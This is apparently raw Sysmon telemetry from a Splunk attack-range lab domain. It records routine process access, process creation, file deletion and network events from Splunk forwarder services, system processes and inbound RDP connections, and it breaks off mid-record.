10341000x8000000000000000295282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.170{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-151A-6216-BB06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.170{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.168{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-151A-6216-BB06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.156{C8EA50B7-151A-6216-BB06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.043{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAC198809BB083C5FAED0205502B2F5E,SHA256=97BDD2878784E034D44484CFBE39CCBAFC7C6021291003D99FC7DB69E208F293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:03.396{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81619316061D30EEDFB190CF47929E4D,SHA256=6640A546D910646D4CC550238FF708FA116CEA1E26194CF946857982F1DE13EE,IMPHASH=00000000000000000000000000000000falsetrue 154100x8000000000000000295290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.993{C8EA50B7-151B-6216-BC06-000000003802}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000295289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.533{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49221-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1D5EDE7CCFAE4F241615695CFA1B2C3,SHA256=B6117CE24D23A60CC20CC4B3F7BF5DDEC9F2BE9A1217BD7F64B062023658C13C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:04.458{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37278CDF569C76C19F3B3860C06FB399,SHA256=933EA21AC67F1187391989F3E7180BF20510CE41D3B845875B61F3A9120312F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:04.411{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58B9ECABD81145AD58096144ED273CB2,SHA256=BCFDCE1BEEEAE6576AC8D0F58D0304C6880860DA7135CE14B70D4230B0E0ED4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:04.978{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C57CD526246B09432070C17377D58E6D,SHA256=B6760834678D477BC4EB246872FFAA9A9C1475F209538DCDEDFEB5E8482A7E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:04.978{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F976CA34F0C926F14049AAE2C8AB241D,SHA256=486CB6C0B90D6F0CBDA5DA7360CAA9A7A8DA961FB018E9DD2F4778F38368DE19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:04.161{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11A8202647C98ED18AC52D2F54A5338E,SHA256=E360DE94E5D5FC941099F1C5EA21796AEB5EC0F293E4660717D41E15EFE616A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:01.719{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx63936-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000295297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.991{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-151B-6216-BC06-000000003802}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.991{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.991{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.991{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.991{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.991{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-151B-6216-BC06-000000003802}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.991{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-151B-6216-BC06-000000003802}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:05.427{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=515DABC3199490581294293A579C2525,SHA256=F75EF387A7439EA2AED7D5283C3211868B5135CBA79C702C4197E5F8541155D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.334{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49222-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:03.334{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49222-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000295301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:05.193{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2191BC48CCE764EDB610E323C1C044DE,SHA256=22847B6239D6FC5170EE6A9DE7E8938DFADEE8F3EAC485C5D439CC18F75DF6DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:06.442{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C5DF79E137A4FFC5925A823E60E9F1F,SHA256=97720D56D0864C7CDA465828C35297AAC1463A8CE88D920796789962FB9407A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:06.346{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=494785493AC4D919F1ACDA72244A2F64,SHA256=8F38E4E87027C638B6DD68946C3E7FD1796B5824814ECDA1C325A6DC5DAC3287,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:06.209{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3D2AC805AD9B9CF69E4158B80B7F6A3,SHA256=76DB4DFB06BD34680CC64B845EF9D8FC4626530ECC18C27838DBF3F1B95793EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:03.516{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51521-false10.0.1.12-8000- 23542300x8000000000000000219483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:07.474{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DD85B171D6190C6433277B87056490E,SHA256=21C4498BEFA0B1DEDEC75170FEA7928604A5336EB957B25045C9480C10A27A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:07.442{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332CC0F5DC4B983A4D8EF69BBB641FD3,SHA256=E9BEB06403BE51E4704B7F1C4C87A404DB82E7AE5431C42DD0190AE8E24848C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.745{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF88B97D0C80A12E393E1929376C4C1B,SHA256=B8123E29E841F30FD7CA086B70B00FD852C72C6C70D80539B9649B406969FC27,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:04.845{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61988-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000295348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:07.092{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 